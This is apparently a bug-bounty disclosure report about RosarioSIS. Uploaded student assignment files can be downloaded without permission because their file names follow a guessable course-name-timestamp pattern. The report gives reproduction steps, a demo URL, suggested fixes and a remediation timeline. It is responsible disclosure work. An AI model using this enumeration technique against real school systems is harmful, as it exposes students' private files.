Exposure of Sensitive Information to an Unauthorized Actor in francoisjacquet/rosariosis

Valid

Reported on

Apr 29th 2022

Description

Attacker can be able to download file from system.

Proof of Concept

1.Login as student - > Go to GRADES -> Assignments -> Submit a file to a random assignment -> save.

2.Attacker (with or without account) can be able to download through this URL https://www.rosariosis.org/demonstration/assets/AssignmentsFiles/2021/Quarter7/Teacher2/mathematics%206_1_student%20s%20student_2022-04-29%2003_50_45.zip.

3.The name of a file will be created with format {COURSE_TITLE}_{student_name}_{timestamp}_.{file_ext} -> Easy to bruteforce.

Way to fix

There are two ways to fix this issue:

Change name format to harder way to predict.
Require permission in download file function.

Impact

This vulnerability is capable of Exposure of Sensitive Information to an Unauthorized Actor

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. 2 years ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago

François Jacquet validated this vulnerability 2 years ago

dungtuanha has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

François Jacquet marked this as fixed in 8.9.5 with commit d6e4da 2 years ago

François Jacquet has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation